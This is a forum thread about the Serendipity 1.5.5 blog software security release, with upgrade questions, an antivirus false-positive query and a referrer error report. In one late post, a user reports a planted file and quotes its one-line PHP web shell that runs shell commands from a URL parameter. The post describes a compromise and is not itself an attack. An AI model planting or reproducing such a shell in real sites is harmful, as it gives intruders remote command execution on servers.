Page 1 of 1

Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Tue Dec 21, 2010 11:36 pm
by garvinhicking
Hi!

Serendipity 1.5.5 has been released to address a serious security issue. Please read http://blog.s9y.org/archives/224-Import ... eased.html

Regards,
Garvin

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Tue Dec 28, 2010 12:38 pm
by ellisse
Hi...I'm sorry, but I've found a virus named Obfuscated in plugins\QuickTag\tag-lib.js (AVG Antivirus). Can I safely upgrade serendipity 1.5.5 after the virus elimination?
Thanks
e.

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Wed Dec 29, 2010 12:44 pm
by garvinhicking
Hi!

tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.

If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").

HTH,
Garvin

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Wed Dec 29, 2010 2:25 pm
by peacekeeper
Hi,
after I updates S9Y to Version 1.5.5 I cannot create new entrys. I have got the following error alert "Ihr Browser hat keinen gültigen HTTP-Referrer übermittelt. Dies kann entweder daher kommen, dass Ihr Browser/Proxy nicht korrekt konfiguriert ist, oder dass Sie Opfer einer "Cross Site Request Forgery (XSRF)" waren, mit der man Sie zu ungewollten Änderungen zwingen wollte. Die angeforderte Aktion konnte daher nicht durchgeführt werden."

I updated 3 Blogs of my blogs. It´s the same problem on each blog. I tested it on Internet Explorer 8 Firefox and Chrome! Same problem! :-(

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Fri Dec 31, 2010 3:38 pm
by garvinhicking
Hi!

From which version did you upgrade from? Did you change anything in your PHP installation and/or .htaccess?

The error usually only happens if the PHP sessions mismatch, or your browser does not submit a "HTTP Referer" string. Also make sure you use the blog domain name to login that is configured inside s9y as the HTTP host.

HTH,
Garvin

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Sun Jan 02, 2011 11:45 pm
by bryzo
I downloaded 1.5.5 LITE yesterday. Is that download already patched? Or do I need to patch it?

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Mon Jan 03, 2011 2:13 am
by Don Chambers
the lite version should also be the upgraded version.

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Fri Jan 14, 2011 8:32 pm
by Maccsta
I haven't updated some of my blogs for years! Better do this one then!

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Tue Jan 25, 2011 2:17 pm
by david@mediacopy
I've just installed the new version. While checking I found a file called

1.php.png

containing the line <?PHP system($_GET['cmd']); ?>

Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Wed Feb 23, 2011 4:58 am
by VideoRob
Looks like I should update. I have over 50 blogs that I haved updated in years.